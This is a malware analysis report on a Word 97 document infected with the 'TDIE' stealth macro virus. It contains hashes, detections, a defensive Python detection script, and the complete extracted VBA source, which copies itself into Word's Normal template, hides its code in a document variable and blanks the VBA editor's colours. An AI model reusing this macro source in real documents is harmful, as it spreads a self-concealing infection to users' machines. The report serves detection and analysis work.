Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 654e68965e88a8c4…

MALICIOUS

Office (OLE)

Size: 40.5 KB
Created: 2099-10-18 14:41:00 (the creation timestamp lies in the future, so the document metadata was forged or written by a wrongly set clock and must not be used for timelining)
Authoring application: Microsoft Word 8.0 (Word 97)
First seen: 2012-06-14
MD5: 230565bf166e3a4f224a2d674a176249
SHA-1: 46c77cdbe119a05d2fe270270b46500383d5dfe6
SHA-256: 654e68965e88a8c42dadf0a266091c44da96cc1e100087f4c1a89a6a2ad9a1e8
Risk Score: 180

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a Microsoft Word document whose VBA project runs automatically from a Document_Open handler in the ThisDocument module. The extracted code is not a downloader; it is a self-replicating macro virus built from the "TDIE" (This Document Infection Engine) kit, whose only function is to copy itself into Word's global template and hide. On open it reads its own source back from the document's VBProject CodeModule, wipes the module in both the active document and Normal.ThisDocument, writes in its place a Document_Close stub padded with five carriage returns and 300 spaces, and stashes the full source in a document variable named "A" (Chr(65)) in both the document and the Normal template. The stub restores the source from that variable and saves when the document is closed, so the code is absent from the module while the document is open and reappears on disk afterwards. The macro also writes CodeForeColors and CodeBackColors under HKEY_CURRENT_USER\Software\Microsoft\VBA\Office through System.PrivateProfileString, setting text and background to the same palette index so that any code left in the VBA editor is rendered invisible. The "Penetrate:" label is the kit's empty slot for user code and a program path to launch; nothing has been filled in, so no download, dropper or command execution is present in this sample, which matches the extractor's "Obfuscation or payload: unlikely" assessment of the carved macro. ClamAV flags the document as Doc.Trojan.Codefore-1 and the carved macro as Doc.Trojan.Pene-1. The self-modification depends on programmatic access to the VBA project object model, which Word 97 did not restrict and which current Office versions block unless "Trust access to the VBA project object model" is enabled in the Trust Center; a macro that touches VBProject.VBComponents from inside a document is itself a strong indicator, and the two generic findings below (macros present, Document_Open) do not capture it.
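The stealth loop described above is what a triage rule should key on rather than the mere presence of a macro. The Python script below is an added example for this report, not the analyzer's own code: it runs a handful of regex indicators over a decompressed VBA module, resolves Chr(n) literals so the document-variable name the code hides behind becomes readable, and classifies the module. The indicator names are this example's own, not the analyzer's heuristic IDs, and the sample input is a cut-down copy of the Document_Open routine from the extracted macro, embedded inline so the script runs offline; in practice feed it the text olevba produces.

```python
import re

# Constructed sample: the statements of the Document_Open routine quoted from
# the extracted macro in this report, with the banner and comments removed.
SAMPLE_VBA = r'''
Private Sub Document_Open()
On Error Resume Next
ResetMe = String(5, Chr(13))
ResetMe = ResetMe & String(300, "   ") & "Private Sub Document_Close(): "
ResetMe = ResetMe & "With ThisDocument.VBProject.VBComponents(1).CodeModule: .DeleteLines 1, .CountOfLines: .InsertLines 1, ThisDocument.Variables(chr(65)).Value: End With: ThisDocument.Save: "
ResetMe = ResetMe & "End Sub"
For x = 1 To ActiveDocument.Variables.Count
    ActiveDocument.Variables(x).Delete
Next x
For x = 1 To Normal.ThisDocument.Variables.Count
    Normal.ThisDocument.Variables(x).Delete
Next x
With ThisDocument.VBProject.VBComponents(1).CodeModule
    VCC = .Lines(1, .CountOfLines)
End With
With ActiveDocument.VBProject.VBComponents(1).CodeModule
    .DeleteLines 1, .CountOfLines
    .InsertLines 1, ResetMe
End With
With Normal.ThisDocument.VBProject.VBComponents(1).CodeModule
    .DeleteLines 1, .CountOfLines
    .InsertLines 1, ResetMe
End With
ActiveDocument.Variables.Add (Chr(65)), VCC
Normal.ThisDocument.Variables.Add (Chr(65)), VCC
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\VBA\Office", "CodeBackColors") = "1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\VBA\Office", "CodeForeColors") = "1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1"
End Sub
'''

# Word event handlers and legacy auto-macro names that run without user action.
AUTOEXEC = re.compile(
    r"\bSub\s+(Document_Open|Document_Close|Document_New|AutoOpen|AutoClose|AutoExec|AutoNew)\b",
    re.I,
)

# Indicator names are hypothetical (this example's own), not the analyzer's
# heuristic IDs. Each one targets one step of the TDIE stealth loop.
INDICATORS = {
    # code reads or rewrites a module through the VBA extensibility model
    "vbproject_codemodule_access": re.compile(
        r"\.VBProject\.VBComponents\s*\(\s*\d+\s*\)\s*\.CodeModule", re.I),
    # module contents wiped wholesale
    "codemodule_wipe": re.compile(r"\.DeleteLines\s+1\s*,\s*\.CountOfLines", re.I),
    # replacement code written at line 1 (the Document_Close stub here)
    "codemodule_rewrite": re.compile(r"\.InsertLines\s+1\s*,", re.I),
    # anything written into Word's global template outlives this document
    "normal_template_write": re.compile(
        r"\bNormal\.ThisDocument\.(?:VBProject|Variables)\b", re.I),
    # source stashed in a document variable instead of the module
    "code_stashed_in_docvar": re.compile(r"\.Variables\.Add\b", re.I),
    # VBA editor colours changed so remaining code is unreadable on screen
    "vbe_color_tamper": re.compile(
        r"PrivateProfileString\s*\(.*?\\VBA\\Office.*?Code(?:Fore|Back)Colors", re.I),
}


def resolve_chr(src: str) -> str:
    """Replace Chr(n) calls with the quoted character, e.g. Chr(65) -> "A"."""
    return re.sub(r"\bChr\s*\(\s*(\d+)\s*\)",
                  lambda m: '"%s"' % chr(int(m.group(1))), src, flags=re.I)


def scan_vba(src: str) -> dict:
    """Triage a decompressed VBA module for self-modifying, template-infecting behaviour."""
    src = resolve_chr(src)
    hits = {name: len(rx.findall(src)) for name, rx in INDICATORS.items()}
    autoexec = sorted({m.group(1) for m in AUTOEXEC.finditer(src)}, key=str.lower)
    # names of document variables that receive data (visible after Chr() resolution)
    stash_vars = sorted(set(re.findall(r'\.Variables\.Add\s*\(?\s*"([^"]*)"', src)))
    self_modifying = (hits["vbproject_codemodule_access"] > 0
                      and hits["codemodule_wipe"] > 0
                      and hits["codemodule_rewrite"] > 0)
    infects_normal = hits["normal_template_write"] > 0
    if self_modifying and infects_normal:
        verdict = "macro virus (self-replicating, stealth)"
    elif any(hits.values()) or autoexec:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {
        "autoexec": autoexec,
        "hits": hits,
        "stash_variables": stash_vars,
        "self_modifying": self_modifying,
        "infects_normal_template": infects_normal,
        "verdict": verdict,
    }


if __name__ == "__main__":
    for key, value in scan_vba(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

On this sample the scan reports two auto-executing handlers (Document_Open from the module and Document_Close from the stub string), the stash variable "A", and the macro-virus verdict. A hit on vbproject_codemodule_access alone is worth a look even without the rest: legitimate documents rarely need the VBA extensibility model, and on modern Office the call fails silently under On Error Resume Next unless trust access to the VBA project object model has been enabled.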

Heuristics (3)

  • CLAMAV_DETECTION (critical): ClamAV detected this file as malware: Doc.Trojan.Codefore-1
  • OLE_VBA_MACROS (medium, 1 related finding): the document contains VBA macro code
  • OLE_VBA_DOCOPEN (high): a Document_Open handler is present, so the macro runs as soon as the document is opened with macros enabled

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                               Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)  7303 bytes

SHA-256: 343a085d7b734025268ee45d4302ffdbf3f9522d9bb76a213c6c243b96ffa80f
Detection: ClamAV: Doc.Trojan.Pene-1
Obfuscation or payload: unlikely
Preview script

First 1,000 lines of the extracted script. The listing has two parts: the decompressed VBA source of the ThisDocument module, followed (from the line beginning "' Processing file:") by a P-code disassembly of the same module appended as VBA comments; the disassembly is cut off at the end of the preview.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()

Rem + - - - - - - - - - - - - - - - - - - - - - +
Rem | Stealth This Document Infection Engine    |
Rem | fast and 98 % stealth AND class infection |
Rem |                                           |
Rem | TDIE by Lord Arz      (Lord_Arz@gmx.net)  |
Rem + - - - - - - - - - - - - - - - - - - - - - +

On Error Resume Next    'catch all errors
ResetMe = String(5, Chr(13))    'generate stealth
ResetMe = ResetMe & String(300, "   ") & "Private Sub Document_Close(): "   'recover code
ResetMe = ResetMe & "With ThisDocument.VBProject.VBComponents(1).CodeModule: .DeleteLines 1, .CountOfLines: .InsertLines 1, ThisDocument.Variables(chr(65)).Value: End With: ThisDocument.Save: "   'recover code
ResetMe = ResetMe & "End Sub"   'recover code

For x = 1 To ActiveDocument.Variables.Count   'clear variables
    ActiveDocument.Variables(x).Delete
Next x

For x = 1 To Normal.ThisDocument.Variables.Count   'clear variables
    Normal.ThisDocument.Variables(x).Delete
Next x

With ThisDocument.VBProject.VBComponents(1).CodeModule  'read virus code
    VCC = .Lines(1, .CountOfLines)
End With

With ActiveDocument.VBProject.VBComponents(1).CodeModule    'delete code in Doc
    .DeleteLines 1, .CountOfLines
    .InsertLines 1, ResetMe 'insert stealth
End With

With Normal.ThisDocument.VBProject.VBComponents(1).CodeModule   'delete code in Normal
    .DeleteLines 1, .CountOfLines
    .InsertLines 1, ResetMe 'insert stealth
End With

ActiveDocument.Variables.Add (Chr(65)), VCC 'store code in variable area of Doc
Normal.ThisDocument.Variables.Add (Chr(65)), VCC    'store code in variale area of Normal

System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\VBA\Office", "CodeBackColors") = "1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1"    'change background colors
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\VBA\Office", "CodeForeColors") = "1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1"  'change code colors

Penetrate:
'UC (Insert user code here):
Rem
Rem
'SP (path and program to start)
End Sub

' Processing file: /opt/analyzer/scan_staging/7e2e474705b54571baa101d11d886d4b.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 8502 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' Line #2:
' 	Rem 0x002E " + - - - - - - - - - - - - - - - - - - - - - +"
' Line #3:
' 	Rem 0x002E " | Stealth This Document Infection Engine    |"
' Line #4:
' 	Rem 0x002E " | fast and 98 % stealth AND class infection |"
' Line #5:
' 	Rem 0x002E " |                                           |"
' Line #6:
' 	Rem 0x002E " | TDIE by Lord Arz      (Lord_Arz@gmx.net)  |"
' Line #7:
' 	Rem 0x002E " + - - - - - - - - - - - - - - - - - - - - - +"
' Line #8:
' Line #9:
' 	OnError (Resume Next) 
' 	QuoteRem 0x0018 0x0010 "catch all errors"
' Line #10:
' 	LitDI2 0x0005 
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	ArgsLd String$ 0x0002 
' 	St ResetMe 
' 	QuoteRem 0x0020 0x0010 "generate stealth"
' Line #11:
' 	Ld ResetMe 
' 	LitDI2 0x012C 
' 	LitStr 0x0003 "   "
' 	ArgsLd String$ 0x0002 
' 	Concat 
' 	LitStr 0x001E "Private Sub Document_Close(): "
' 	Concat 
' 	St ResetMe 
' 	QuoteRem 0x004C 0x000C "recover code"
' Line #12:
' 	Ld ResetMe 
' 	LitStr 0x00AB "With ThisDocument.VBProject.VBComponents(1).CodeModule: .DeleteLines 1, .CountOfLines: .InsertLines 1, ThisDocument.Variables(chr(65)).Value: End With: ThisDocument.Save: "
' 	Concat 
' 	St ResetMe 
' 	QuoteRem 0x00C4 0x000C "recover code"
' Line #13:
' 	Ld ResetMe 
' 	LitStr 0x0007 "End Sub"
' 	Concat 
' 	St ResetMe 
' 	QuoteRem 0x0020 0x000C "recover code"
' Line #14:
' Line #15:
' 	StartForVariable 
' 	Ld x 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd Variables 
' 	MemLd Coun
... (truncated)